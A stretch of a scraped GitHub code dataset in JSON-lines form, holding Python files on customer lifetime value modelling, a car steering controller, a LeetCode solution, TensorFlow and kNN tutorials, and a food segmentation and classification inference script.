\"order_num_total_ever_offline\", \"customer_value_total_ever_offline\",\n#\"customer_value_total_ever_online\" columns have outliers, suppress them\n\ndf.describe().T\n\nreplace_with_thresholds(df, \"order_num_total_ever_online\")\nreplace_with_thresholds(df, \"order_num_total_ever_offline\")\nreplace_with_thresholds(df, \"customer_value_total_ever_offline\")\nreplace_with_thresholds(df, \"customer_value_total_ever_online\")\n\n#when we look at the data describe, we saw that there was outliers because max and std values changed\n\n#Omnichannel means that customers shop from both online and offline platforms.\n#We will create new variables for the total number of purchases and spend of each customer\n\ndf[\"order_num_total\"] = df[\"order_num_total_ever_online\"] + df[\"order_num_total_ever_offline\"]\ndf[\"customer_value_total\"] = df[\"customer_value_total_ever_online\"] + df[\"customer_value_total_ever_offline\"]\n\n\n#We will examine the variable types and convert the type of variables that express dates to date.\n\ndf.dtypes\ndf[\"first_order_date\"] = df[\"first_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date\"] = df[\"last_order_date\"].apply(pd.to_datetime)\ndf[\"last_order_date_online\"] = df[\"last_order_date_online\"].apply(pd.to_datetime)\ndf[\"last_order_date_offline\"] = df[\"last_order_date_offline\"].apply(pd.to_datetime)\n\n#Creating the CLTV Data Structure\n\ndf[\"last_order_date\"].max()\ntoday_date = dt.datetime(2021, 6, 1)\n\ndf[\"recency\"] = (df[\"last_order_date\"] - df[\"first_order_date\"]).dt.days\n\ncltv = df.groupby(\"master_id\").agg({\"recency\": \"sum\",\n \"first_order_date\": lambda x: (today_date - x).dt.days,\n \"order_num_total\": \"sum\",\n \"customer_value_total\": \"sum\"})\n\ncltv.columns =[\"recency_cltv_weekly\", \"T_weekly\", \"frequency\", \"monetary_cltv_avg\"]\n\ncltv[\"recency_cltv_weekly\"] = cltv[\"recency_cltv_weekly\"] / 7\ncltv[\"T_weekly\"] = cltv[\"T_weekly\"] / 7\ncltv[\"monetary_cltv_avg\"] = cltv[\"monetary_cltv_avg\"] / cltv[\"frequency\"]\ncltv = cltv[cltv[\"frequency\"]>1]\ncltv.head()\ncltv.shape\n\n\n#Creating of BG/NBD, Gamma-Gamma Models and Calculation of CLTV\n#Fit BG/NBD model\n\nbgf = BetaGeoFitter(penalizer_coef=0.001)\nbgf.fit(cltv[\"frequency\"],\n cltv[\"recency_cltv_weekly\"],\n cltv[\"T_weekly\"])\n\n#We will estimate expected purchases from customers within 3 months and add exp_sales_3_month to cltv dataframe\ncltv[\"expected_purc_3_month\"] = bgf.conditional_expected_number_of_purchases_up_to_time(12,\n cltv[\"frequency\"],\n cltv[\"recency_cltv_weekly\"],\n cltv[\"T_weekly\"])\n\n#We will estimate expected purchases from customers within 6 months and add exp_sales_6_month to cltv dataframe\ncltv[\"expected_purc_6_month\"] = bgf.conditional_expected_number_of_purchases_up_to_time(24,\n cltv[\"frequency\"],\n cltv[\"recency_cltv_weekly\"],\n cltv[\"T_weekly\"])\n\n\n#Fit Gamma-Gamma model. 
#We will estimate the average value of the customers and add it to the cltv dataframe as expected_average_value.\nggf = GammaGammaFitter(penalizer_coef=0.01)\nggf.fit(cltv['frequency'], cltv[\"monetary_cltv_avg\"])\n\ncltv[\"expected_average_value\"] = ggf.conditional_expected_average_profit(cltv['frequency'],\n                                                                         cltv[\"monetary_cltv_avg\"])\n\n#Calculating CLTV for 6 months and adding it to the cltv dataframe\nCLTV = ggf.customer_lifetime_value(bgf,\n                                   cltv['frequency'],\n                                   cltv[\"recency_cltv_weekly\"],\n                                   cltv[\"T_weekly\"],\n                                   cltv[\"monetary_cltv_avg\"],\n                                   time=6,  # 6 months\n                                   freq=\"W\",  # frequency unit of T (weekly)\n                                   discount_rate=0.01)\n\nCLTV = CLTV.reset_index()\nCLTV.head()\n\n#master_id is the index after the groupby, so make it an explicit column before merging\ncltv_final = cltv.reset_index().merge(CLTV, on=\"master_id\", how=\"left\")\ncltv_final.sort_values(by=\"clv\", ascending=False).head(20)\n\n\n#Creating Segments by CLTV Value\n\ncltv_final[\"segment\"] = pd.qcut(cltv_final[\"clv\"], 4, labels=[\"D\", \"C\", \"B\", \"A\"])\n\n\n#comment: action recommendations for the next 6 months\n#The recency and age of the A segment are lower than those of the other segments, and its frequencies are higher.\n#Besides, the number of transactions it will make in 6 months and the average benefit it will bring look higher.\n#For this segment, which appears to provide the company with an average of 362,316 and a total of 1806505,089 in revenue over a 6-month period,\n#we can offer special campaigns that will increase the purchasing rate, mention via e-mail that there are campaigns appealing\n#to the customer, and take actions that will make them feel special and encourage shopping.\n\n#The B segment is also close to the A segment. However, the C segment is not in a bad place in terms of shopping frequency and the benefit\n#it will bring. Regular reminders can be made in order not to disturb the shopping routine, so as not to lose the C segment and to preserve\n#the situation. 
Categories of interest can be analyzed and information can be given in that direction.","repo_name":"Birsenn/FLO_CRM_Analytics","sub_path":"FLO_CLTV_Analysis & Prediction.py","file_name":"FLO_CLTV_Analysis & Prediction.py","file_ext":"py","file_size_in_byte":7006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28742610215","text":"import numpy as np\n\n\nclass Controller:\n \"\"\"Linear controller for the steering wheel\"\"\"\n\n def __init__(\n self, qsi: float, w_n: float, v_ref: float, w_ref: float, h: float, L: float\n ):\n \"\"\"\n Parameters\n ----------\n qsi: float\n Damping Ratio\n w_n: float\n Natural Frequency\n v_ref: float\n Linear velocity reference (km/h)\n w_ref: float\n Steering wheel velocity reference\n h: float\n Integration Step\n L: float\n Car dimension\n \"\"\"\n\n self.qsi = qsi\n self.w_n = w_n\n self.v_ref = v_ref / 3.6 # m/s\n self.w_ref = w_ref\n self.kv = 2 * qsi * w_n\n self.ks = self.kv\n self.ki = (w_n**2 - w_ref**2) / abs(self.v_ref)\n self.h = h\n self.L = L\n self.last_error = np.zeros((3, 1))\n\n def print_parameters(self):\n \"\"\"\n Print parameters of the controller\n \"\"\"\n print(\n f\"\"\"\n\n qsi value: {self.qsi}\n w_n value: {self.w_n}\n v_ref value: {self.v_ref} m/s\n w_ref value: {self.w_ref}\n kv value: {self.kv}\n ks value: {self.ks}\n ki value: {self.ki}\n h value: {self.h}\n L value: {self.L}\n Closed Loop poles of the system {self.poles()}\n\n \"\"\"\n )\n\n def following_trajectory(self, ref: np.array, position: np.array) -> np.array:\n \"\"\"\n Computes next position and control signal given the current position and the next point using the linear controller\n\n Inputs:\n -ref: a numpy array with dimensions 4x1 (x_ref,y_ref,theta_ref_phi_ref) of planned trajectory\n Outputs:\n -position : next position\n -np.array([v,ws]): control signal\n \"\"\"\n error = np.zeros((3, 1))\n w_ref = np.sin(ref[3]) * self.v_ref / self.L\n world_error = ref[:-1] - position[:-1]\n bot_error = np.matmul(\n np.array(\n [\n [np.cos(position[2]), np.sin(position[2]), 0],\n [-np.sin(position[2]), np.cos(position[2]), 0],\n [0, 0, 1],\n ]\n ),\n world_error,\n )\n bot_error = bot_error[:, np.newaxis]\n u = np.array(\n [\n -self.kv * self.last_error[0],\n -self.ki * self.last_error[1] - self.ks * self.last_error[2],\n ]\n )\n error_dynamics = (\n np.array(\n [[0, w_ref, 0], [-w_ref, 0, self.v_ref * np.cos(ref[3])], [0, 0, 0]]\n )\n @ bot_error\n + np.array([[np.cos(ref[3]), 0], [0, 0], [0, 1]]) @ u\n )\n error = bot_error + self.h * error_dynamics\n v = self.kv * error[0]\n if v > 10:\n v = [10]\n ws = self.ki * error[1] + self.ks * error[2]\n self.last_error = error\n return np.array([v, ws]).reshape((2,))\n\n def following_reference(self, ref: np.array, num_points: int = None) -> np.array:\n \"\"\"\n Gives trajectory followed by the model using this kind of Controller\n\n Inputs:\n -ref: a numpy array with dimensions 3xK (x_ref,y_ref,theta_ref) where K is the number of points to compute\n -num_points : a integer that expresses the number of points of trajectory vector (time_simulation*h)\n Outputs:\n -trajectory: a numpy array with dimensions 4xK (x,y,theta,phi) followed by the car model\n \"\"\"\n if num_points != None:\n trajectory = np.zeros((ref.shape[0] + 1, min(ref.shape[1], num_points)))\n else:\n trajectory = np.zeros((ref.shape[0] + 1, ref.shape[1]))\n\n for k in range(trajectory.shape[1] - 1):\n world_error = ref[:, k] - trajectory[:-1, k]\n bot_error = np.matmul(\n np.array(\n [\n 
[np.cos(trajectory[2, k]), np.sin(trajectory[2, k]), 0],\n [-np.sin(trajectory[2, k]), np.cos(trajectory[2, k]), 0],\n [0, 0, 1],\n ]\n ),\n world_error,\n )\n v = self.kv * bot_error[0]\n ws = self.ki * bot_error[1] + self.ks * bot_error[2]\n derivative = np.array(\n [\n [np.cos(trajectory[2, k]), 0],\n [np.sin(trajectory[2, k]), 0],\n [np.tan(trajectory[3, k]) / self.L, 0],\n [0, 1],\n ]\n )\n trajectory[:, k + 1] = trajectory[:, k] + self.h * np.matmul(\n derivative, np.array([v, ws])\n )\n if abs(trajectory[3, k + 1]) > np.pi / 8:\n trajectory[3, k + 1] = np.sign(trajectory[3, k + 1]) * np.pi / 8\n return trajectory\n\n def poles(self):\n \"\"\"\n Compute closed loop poles of the system\n \"\"\"\n poles, _ = np.linalg.eig(\n np.array([[0, self.w_ref, 0], [-self.w_ref, 0, self.v_ref], [0, 0, 0]])\n - np.matmul(\n np.array([[1, 0], [0, 0], [0, 1]]),\n np.array([[self.kv, 0, 0], [0, self.ki, self.ks]]),\n )\n )\n return poles\n\n\nif __name__ == \"__main__\":\n from matplotlib import pyplot as plt\n from scipy import signal\n\n # Examples of trajectories\n\n x_ref = np.arange(0, 50, 0.01)\n\n y_ref_traj = [\n np.cos(0.02 * x_ref),\n signal.square(2 * np.pi * 0.02 * x_ref),\n np.zeros(x_ref.shape) + 1,\n ]\n\n t_simulation = 10\n L = 2.2\n h = 0.01\n qsi = 1\n w_n = 10\n v_ref = 36 # km/h\n w_ref = 4\n num_points = int(t_simulation / h)\n simulation = Controller(qsi=qsi, w_n=w_n, v_ref=v_ref, w_ref=w_ref, h=h, L=L)\n simulation.print_parameters()\n for y_ref in y_ref_traj:\n teta_ref = np.zeros(y_ref.shape)\n for k in range((y_ref.shape[0]) - 1):\n teta_ref[k] = np.arctan2(y_ref[k + 1] - y_ref[k], x_ref[k + 1] - x_ref[k])\n\n Ref = np.array([[x_ref], [y_ref], [teta_ref]])\n Ref = Ref.reshape(Ref.shape[0], Ref.shape[2])\n\n trajectory = simulation.following_reference(ref=Ref, num_points=None)\n plt.figure()\n plt.xlabel(\"x axis caption\")\n plt.ylabel(\"y axis caption\")\n plt.plot(trajectory[0, :], trajectory[1, :])\n plt.plot(Ref[0, :], Ref[1, :])\n\n plt.figure()\n plt.plot(trajectory[2, :])\n\n plt.show()\n","repo_name":"TiagoLourinho/autonomous-car","sub_path":"source/blocks/linear_controller.py","file_name":"linear_controller.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"31934830526","text":"# As the ruler of a kingdom, you have an army of wizards at your command.\n# You are given a 0-indexed integer array strength, where strength[i] denotes the strength of the ith wizard. For a contiguous group of wizards (i.e. the wizards' strengths form a subarray of strength), the total strength is defined as the product of the following two values:\n# - The strength of the weakest wizard in the group.\n# - The total of all the individual strengths of the wizards in the group.\n# Return the sum of the total strengths of all contiguous groups of wizards. 
Since the answer may be very large, return it modulo 10^9 + 7.\n# A subarray is a contiguous non-empty sequence of elements within an array.\n#\n# Example 1:\n#\n# Input: strength = [1,3,1,2]\n# Output: 44\n# Explanation: The following are all the contiguous groups of wizards:\n# - [1] from [1,3,1,2] has a total strength of min([1]) * sum([1]) = 1 * 1 = 1\n# - [3] from [1,3,1,2] has a total strength of min([3]) * sum([3]) = 3 * 3 = 9\n# - [1] from [1,3,1,2] has a total strength of min([1]) * sum([1]) = 1 * 1 = 1\n# - [2] from [1,3,1,2] has a total strength of min([2]) * sum([2]) = 2 * 2 = 4\n# - [1,3] from [1,3,1,2] has a total strength of min([1,3]) * sum([1,3]) = 1 * 4 = 4\n# - [3,1] from [1,3,1,2] has a total strength of min([3,1]) * sum([3,1]) = 1 * 4 = 4\n# - [1,2] from [1,3,1,2] has a total strength of min([1,2]) * sum([1,2]) = 1 * 3 = 3\n# - [1,3,1] from [1,3,1,2] has a total strength of min([1,3,1]) * sum([1,3,1]) = 1 * 5 = 5\n# - [3,1,2] from [1,3,1,2] has a total strength of min([3,1,2]) * sum([3,1,2]) = 1 * 6 = 6\n# - [1,3,1,2] from [1,3,1,2] has a total strength of min([1,3,1,2]) * sum([1,3,1,2]) = 1 * 7 = 7\n# The sum of all the total strengths is 1 + 9 + 1 + 4 + 4 + 4 + 3 + 5 + 6 + 7 = 44.\n#\n# Example 2:\n#\n# Input: strength = [5,4,6]\n# Output: 213\n# Explanation: The following are all the contiguous groups of wizards:\n# - [5] from [5,4,6] has a total strength of min([5]) * sum([5]) = 5 * 5 = 25\n# - [4] from [5,4,6] has a total strength of min([4]) * sum([4]) = 4 * 4 = 16\n# - [6] from [5,4,6] has a total strength of min([6]) * sum([6]) = 6 * 6 = 36\n# - [5,4] from [5,4,6] has a total strength of min([5,4]) * sum([5,4]) = 4 * 9 = 36\n# - [4,6] from [5,4,6] has a total strength of min([4,6]) * sum([4,6]) = 4 * 10 = 40\n# - [5,4,6] from [5,4,6] has a total strength of min([5,4,6]) * sum([5,4,6]) = 4 * 15 = 60\n# The sum of all the total strengths is 25 + 16 + 36 + 36 + 40 + 60 = 213.\n#\n# Constraints:\n#\n# 1 <= strength.length <= 10^5\n# 1 <= strength[i] <= 10^9\n\n\n# https://leetcode.com/problems/sum-of-total-strength-of-wizards/discuss/2061985/JavaC%2B%2BPython-One-Pass-Solution\n# Time O(n)\n# Space O(n)\n#\n# Key words\n# Subarray + sum -> prefix sum\n# Subarray + minimum -> mono stack\n#\n#\n# Intuition\n# Assume A[i] is the leftmost smallest element in a subarray,\n# calculate each A[i] contribution\n#\n#\n# Explanation\n# 1. Find next small on the right\n# 2. Find next small or equal on the left.\n# 3. For each strength[i] as the minimum, find the possible subarray sums.\nfrom typing import List\nfrom itertools import accumulate\n\n\nclass Solution:\n    def totalStrength(self, strength: List[int]) -> int:\n        n = len(strength)\n\n        # indices of next small on the right\n        right = [n] * n\n        st = []\n        for i in range(n):\n            while st and strength[st[-1]] > strength[i]:\n                right[st.pop()] = i\n            st.append(i)\n\n        # indices of next small or equal on the left\n        left = [-1] * n\n        st = []\n        for i in range(n - 1, -1, -1):\n            while st and strength[st[-1]] >= strength[i]:\n                left[st.pop()] = i\n            st.append(i)\n\n        # for each strength[i] as minimum, calculate sum\n        res = 0\n        acc = list(accumulate(accumulate(strength), initial=0))\n        for i in range(n):\n            l, r = left[i], right[i]\n            lacc = acc[i] - acc[max(l, 0)]\n            racc = acc[r] - acc[i]\n            ln, rn = i - l, r - i\n            res += strength[i] * (racc * ln - lacc * rn)\n        # parenthesize the modulus: res % 10 ** 9 + 7 would compute (res % 10**9) + 7\n        return res % (10 ** 9 + 7)\n","repo_name":"hongbo-miao/leetcode","sub_path":"Python/2281. Sum of Total Strength of Wizards.py","file_name":"2281. 
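# --- Added example (not part of the original record): a tiny O(n^2) brute force of the
# same problem statement, useful only to cross-check the stack/prefix-sum solution above
# on small inputs. The function name is illustrative, not from the original file.
def total_strength_bruteforce(strength):
    MOD = 10 ** 9 + 7
    n, res = len(strength), 0
    for i in range(n):
        subtotal, weakest = 0, float("inf")
        for j in range(i, n):
            subtotal += strength[j]              # running sum of strength[i..j]
            weakest = min(weakest, strength[j])  # weakest wizard in strength[i..j]
            res += weakest * subtotal
    return res % MOD

assert total_strength_bruteforce([1, 3, 1, 2]) == 44  # Example 1
assert total_strength_bruteforce([5, 4, 6]) == 213    # Example 2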
Sum of Total Strength of Wizards.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":197,"dataset":"github-code","pt":"3"} +{"seq_id":"71583680721","text":"'''\r\n第4章 深层神经网络\r\n 4.1 深度学习与深层神经网络\r\n 1、深度学习两个重要特性是多层和非线性。\r\n 2、分类问题中,交叉熵作为损失函数,衡量的是两个概率分布之间的距离。\r\n 3、回归问题中,最常用的是损失函数是均方误差MSE。均方误差在分类中也经常使用���\r\n\r\n'''\r\n\r\nimport tensorflow as tf\r\n#tf.greater函数和tf.select函数的用法\r\nv1 = tf.constant([1.0,2.0,3.0,4.0])\r\nv2 = tf.constant([4.0,3.0,2.0,1.0])\r\nsess = tf.InteractiveSession()\r\nprint(tf.greater(v1,v2).eval())\r\nprint(tf.where(tf.greater(v1,v2),v1,v2).eval())\r\n\r\n#简单的神经网络讲解损失函数对模型训练结果的影响\r\n\r\nimport tensorflow as tf\r\nfrom numpy.random import RandomState\r\nbatch_size = 8\r\nx = tf.placeholder(tf.float32,shape=(None,2),name='x-input')\r\ny_ = tf.placeholder(tf.float32,shape=(None,1),name='y-input')\r\n\r\nw1 = tf.Variable(tf.random_normal([2,1],stddev=1,seed=1))\r\ny = tf.matmul(x,w1)\r\n\r\nloss_less = 10\r\nloss_more = 1\r\nloss = tf.reduce_sum(tf.where(tf.greater(y,y_),\r\n (y - y_)*loss_more,\r\n (y_ - y)*loss_less))\r\ntrain_step = tf.train.AdamOptimizer(0.001).minimize(loss)\r\n\r\nrdm = RandomState(1)\r\ndataset_size = 128\r\nX = rdm.rand(dataset_size,2)\r\nY = [[x1 + x2 + rdm.rand()/10.0-0.05] for (x1,x2) in X]\r\n\r\nwith tf.Session() as sess:\r\n init_op = tf.global_variables_initializer()\r\n sess.run(init_op)\r\n STEPS = 5000\r\n for i in range(STEPS):\r\n start = (i*batch_size) % dataset_size\r\n end = min(start+batch_size,dataset_size)\r\n sess.run(train_step,\r\n feed_dict={x:X[start:end],y_:Y[start:end]})\r\n print(sess.run(w1))\r\n\r\n'''\r\n4.3 神经网络优化算法\r\n 1、梯度下降法主要用于单个参数的取值。\r\n 2、反向传播算法在所有参数上使用梯度下降算法。\r\n 3、梯度下降法存在的问题:1、参数的初始值很大程度上影响最后的结果,\r\n 只有放损失函数是凸函数时,梯度下降法才能保证达到全局最优解;\r\n 2、计算时间太长,因为要在全部训练数据上最小化损失。\r\n 4、为了加快训练速度,随机梯度下降法,每一轮迭代中,随机优化某一条\r\n 训练数据上的损失函数。 SGD的问题是,可能无法达到局部最优。\r\n'''\r\n\r\n'''\r\nTensorflow实现神经网络过程\r\nbatch_size = n\r\nx = tf.placeholder(tf.float32,shape=(batch_size,2),name='x-input')\r\ny_ = tf.placeholder(tf.float32,shape=(batch_size,1),name='y-input')\r\nloss =\r\ntrain_step = tf.train.AdamOptimizer(0.001).minimize(loss)\r\nwith tf.Session() as sess:\r\n for i in range(STEPS):\r\n current_X,current_Y=\r\n sess.run(train_step,feed_dict={x:current_X,y_:current_Y})\r\n'''\r\n\r\n'''\r\n4.4 神经网络进一步优化\r\n 1、通过指数衰减方法设置梯度下降算法中的学习率,既可以在模型训练前期快速\r\n 接近较优解,又可以保证模型在训练后期不会有太大波动。\r\n 2、过拟合问题。\r\n 3、滑动平均模型。滑动平均模型将每一轮得到的模型综合起来,从而得到最终的\r\n 模型更加健壮。\r\n'''\r\n\r\nglobal_step = tf.Variable(0)\r\nlearning_rate = tf.train.exponential_decay(\r\n 0.1,global_step,100,0.96,staircase=True)\r\n\r\n'''\r\n4.4.2 过拟合问题\r\n 1、过拟合指的是当一个模型过于复杂之后,它可以很好的记忆每一个训练数据中\r\n 随机噪音的部分而忘记要去学习训练数据中通用的趋势。\r\n 2、避免过拟合问题,正则化,正则化的思想是在损失函数中加入刻画模型复杂程度的指标。\r\n 3、L1正则化会让参数变得更加稀疏,即让更多参数变为0,打到类似特征选取的功能;\r\n L2正则化会让参数变得很小。\r\n L1正则化的计算公式不可导,L2正则化公式可导。\r\n'''\r\n#带L2正则化的损失函数定义\r\nw = tf.Variable(tf.random_normal([2,1],stddev=1,seed=1))\r\ny = tf.matmul(x,w)\r\n#loss = tf.reduce_mean(tf.square(y_-y)) + tf.contrib.layers.l2_regularizer(lambda)(w)\r\n\r\n\r\nweights = tf.constant([[1.0,-2.0],[-3.0,4.0]])\r\nwith tf.Session() as sess:\r\n print(sess.run(tf.contrib.layers.l1_regularizer(.5)(weights)))\r\n print(sess.run(tf.contrib.layers.l2_regularizer(.5)(weights)))\r\n\r\n\r\n#通过集合计算5层神经网络带L2正则化的损失函数的计算方式\r\nimport tensorflow as tf\r\n'''\r\ndef get_weight(shape,lambda):\r\n var = tf.Variable(tf.random_normal(shape),dtype=tf.float32)\r\n tf.add_to_collection('losses',tf.contrib.layers.l2_regularizer(lambda)(var))\r\n return 
var\r\n'''\r\n\r\nx = tf.placeholder(tf.float32,shape=(None,2))\r\ny_ = tf.placeholder(tf.float32,shape=(None,1))\r\nbatch_size = 8\r\nlayer_dimension = [2,10,10,10,1]\r\nn_layers = len(layer_dimension)\r\n\r\ncur_layer = x\r\nin_dimension = layer_dimension[0]\r\n\r\nfor i in range(i,n_layers):\r\n out_dimension = layer_dimension[i]\r\n #weight = get_weight([in_dimension,out_dimension],0.001)\r\n bias = tf.Variable(tf.constant(0.1,shape=[out_dimension]))\r\n cur_layer = tf.nn.relu(tf.matmul(cur_layer,weight) + bias)\r\n in_dimension = layer_dimension[i]\r\n\r\nmse_loss = tf.reduce_mean(tf.square(y_ - cur_layer))\r\ntf.add_to_collection('losses',mse_loss)\r\nloss = tf.add_n(tf.get_collection('losses'))\r\n\r\n#滑动平均模型\r\nimport tensorflow as tf\r\nv1 = tf.Variable(0,dtype=tf.float32)\r\nstep = tf.Variable(0,trainable=False)\r\n\r\nema = tf.train.ExponentialMovingAverage(0.99,step)\r\nmaintain_average_op = ema.apply([v1])\r\n\r\nwith tf.Session() as sess:\r\n init_op = tf.initialize_all_variables()\r\n sess.run(init_op)\r\n print(sess.run([v1,ema.average(v1)]))\r\n sess.run(tf.assign(v1,5))\r\n print(sess.run([v1,ema.average(v1)]))\r\n sess.run(tf.assign(step,10000))\r\n sess.run(tf.assign(v1,10))\r\n sess.run(maintain_average_op)\r\n print(sess.run([v1,ema.average(v1)]))\r\n sess.run(maintain_average_op)\r\n print(sess.run([v1,ema.average(v1)]))\r\n\r\n","repo_name":"XU-ZHOU/Tensorflow","sub_path":"Chapter4/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24138513983","text":"# http://machinelearningcoban.com/2017/01/08/knn/\n\nimport numpy as np\nimport matplotlib as plt\n\nfrom sklearn import neighbors, datasets\n\niris = datasets.load_iris()\niris_X = iris.data\niris_y = iris.target\n\nprint('Number of classes: %d' % len(np.unique(iris_y)))\nprint('Number of data of point: %d' % len(iris_y))\n\nX0 = iris_X[iris_y == 0,:]\nprint('Samples from class 0:\\n', X0[:5, :])\n\nX1 = iris_X[iris_y == 1, :]\nprint('Samples from class 1:\\n', X1[:5, :])\n\nX2 = iris_X[iris_y == 2, :]\nprint('Samples from class 2:\\n', X2[:5,:])\n\n# create training & test sets\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(iris_X, iris_y, test_size=50)\n\nprint(\"Training size : %d\" % len(y_train))\nprint(\"Test size : %d\" % len(y_test))\n\nclf = neighbors.KNeighborsClassifier(n_neighbors = 1, p = 2)\n# p = 2 --> norm 2\n# norm 1, 2 : http://machinelearningcoban.com/math/#norm0, http://machinelearningcoban.com/math/#norm2\nclf.fit(X_train, y_train)\ny_pred = clf.predict(X_test)\n\nprint(\"Print results for 20 test data points:\")\nprint(\"Predicted labels : \", y_pred[20:40])\nprint(\"Ground truth : \", y_test[20:40])\n\n# evaluation method\nfrom sklearn.metrics import accuracy_score\nprint(\"Accuracy of 1NN: %.2f %%\" %(100*accuracy_score(y_test, y_pred)))\n\n# major voting\nprint(\"-\" * 10 + \"major voting\" + \"-\" * 10)\nclf = neighbors.KNeighborsClassifier(n_neighbors = 10, p = 2)\nclf.fit(X_train, y_train)\ny_pred = clf.predict(X_test)\n\nprint(\"Accuracy of 10NN with major voting: %.2f %%\" %(100*accuracy_score(y_test, y_pred)))\n\n# distance weights\nprint(\"-\" * 10 + \"distnace weights\")\nclf = neighbors.KNeighborsClassifier(n_neighbors = 10, p = 2, weights = \"distance\") # weights = \"uniform\" is default\nclf.fit(X_train, y_train)\n\nprint(\"Accuracy of 10NN (1/distance weights): %.2f %%\" % 
(100*accuracy_score(y_test, y_pred)))\n\n# define own weight function\nprint(\"-\" * 10 + \"customized weights\" + \"-\" * 10)\ndef myweight(distances):\n sigma2 = .5 # we can change this number\n return np.exp(-distances**2/sigma2)\n\nclf = neighbors.KNeighborsClassifier(n_neighbors = 10, p = 2, weights= myweight)\nclf.fit(X_train,y_train)\ny_pred = clf.predict(X_test)\n\nprint(\"Accuracy of 10NN( customized weights: %.2f %%\" %(100*accuracy_score(y_test, y_pred)))\n\n# Data Normalization","repo_name":"mozartvn/deeplearning-study","sub_path":"machinelearningbasic/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74541408722","text":"'''\n/home/haeun/21winter/week7/s_models/0215_22:00/10_0_191118_234105_10_1_0_S_6_13_101101100011.png\n: seg to class 완료!\n지금 과제는 한글로 바꾸기\n'''\n\n# import argparse\n# from doctest import OutputChecker\nimport os\nimport cv2\nimport numpy as np\nfrom PIL import Image, ImageFont, ImageDraw\nfrom torchvision import datasets\nimport torch\nimport torchvision.transforms as T\n\nimport warnings\nwarnings.filterwarnings(action='ignore')\n\nfrom params import param_segmentation as s_params\nfrom params import param_classification as c_params\nfrom params import food_id\nfrom transforms import classification_transforms as data_transform\nimport c_forInf as CI\nfrom MaskRCNN import get_instance_segmentation_model\n\n\n# 명령어: (haeun21w_1) haeun@gpu-server:~/21winter/week6/seg_from$ CUDA_VISIBLE_DEVICES=5 python tmp_inf.py\n# device setting\ndevice = torch.device(\"cuda\")\nprint(\"... finish cuda setting\")\n# device = torch.device('cpu') \n# print(\"... finish cpu setting\")\n\n# load model (MASKRCNN)\n# model_s_path = s_params['0215_13:30_best_model' # 이걸로 하면 뭔가 잘못됐어\nmodel_s_path = s_params['model_1,2_pre_path']\nprint(\"... loading segmetation model\")\nmodel_s = get_instance_segmentation_model(num_classes=2)\nmodel_s.to(device)\n# model_s = model_s.cpu()\n# model_s.load_state_dict(torch.load(model_s_path), map_location='cpu')\nmodel_s.load_state_dict(torch.load(model_s_path))\nmodel_s.eval()\n\n# load model (ResNet)\ndata_dir = c_params['food_root']\ndataset = datasets.ImageFolder(os.path.join(data_dir, 'train'), data_transform['train'])\nprint(\"... loading classification model\")\nmodel_c = CI.load_checkpoint(device, dataset, c_params)\nmodel_c.eval()\n\n# load images and transform\n# input image = real dataset_cycle1(easy)\ninf_path = s_params['inf_path1']\nprint(\"... loading\", end=' ')\nimg_list = sorted(os.listdir(inf_path)) \nif 'Thumbs.db' in img_list: img_list.remove(\"Thumbs.db\")\ntransform = T.Compose([T.ToTensor(),\n T.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]),\n ])\nprint(\"{} images\".format(len(img_list)))\n\n# visualization setting\nout_path = s_params['output_dir']\nout_path = os.path.join(out_path, '0218_04:39')\nif not os.path.isdir(out_path):\n os.makedirs(out_path, exist_ok=True)\nthres = float(0.5)\nprint(\"=\"*20)\n\nprint(\"+++ Start inference !\")\nfor i, img_name in enumerate(img_list):\n if i<=10:\n print(\"... 
inference ({}/{}) _ {}\".format(i+1, len(img_list), img_name))\n # [segmentation]\n # load and transform image\n img_file = os.path.join(inf_path, img_name) \n img_data = Image.open(img_file).convert(\"RGB\")\n\n # for segmentation\n img_tensor = transform(img_data) \n img_tensor = img_tensor.unsqueeze(0).to(device)\n img_arr = np.array(img_data).astype(np.uint8)\n img_arr_c = np.array(img_data).astype(np.uint8)\n print(\"... finish image setting!\")\n # save_name = os.path.join(out_path, '0.png')\n # cv2.imwrite(save_name, img_arr)\n # forward and post-process results\n pred_result = model_s(img_tensor, None)[0]\n pred_mask = pred_result['masks'].cpu().detach().numpy().transpose(0, 2, 3, 1)\n pred_mask[pred_mask >= 0.5] = 1\n pred_mask[pred_mask < 0.5] = 0\n pred_mask = np.repeat(pred_mask, 3, 3)\n pred_scores = pred_result['scores'].cpu().detach().numpy()\n pred_boxes = pred_result['boxes'].cpu().detach().numpy()\n # pred_labels = pred_result['labels']\n print(\"... finish box setting!\")\n \n # draw predictions\n # print(\"[{} Scores]:\".format(pred_scores.shape[0]), list(pred_scores))\n ids = np.where(pred_scores > thres)[0]\n colors = np.random.randint(0, 255, (len(ids), 3))\n for color_i, pred_i in enumerate(ids):\n # save_name = os.path.join(out_path, '1.png')\n # cv2.imwrite(save_name, img_arr)\n color = tuple(map(int, colors[color_i]))\n # draw segmentation\n mask = pred_mask[pred_i] \n mask = mask * color\n img_arr = cv2.addWeighted(img_arr, 1, mask.astype(np.uint8), 0.5, 0)\n # save_name = os.path.join(out_path, '2.png')\n # cv2.imwrite(save_name, img_arr)\n # draw bbox and text\n x1, y1, x2, y2 = map(int, pred_boxes[pred_i])\n cv2.rectangle(img_arr, (x1, y1), (x2, y2), color, 2)\n # save_name = os.path.join(out_path, '3.png') # mask\n # cv2.imwrite(save_name, img_arr)\n # img_arr: numpy\n # 시작점 xy\n # 끝점 xy\n print(\"... finish drawing segmentation!\")\n # add classification\n top = y2\n left = x1\n height = y2-y1\n width = x2-x1\n # c_image_crop = T.functional.crop(c_image, top, left, height, width)\n # for classification\n crop_img = img_arr_c[y1:y2, x1:x2]\n crop_img = cv2.cvtColor(crop_img, cv2.COLOR_BGR2RGB)\n save_name = os.path.join(out_path, 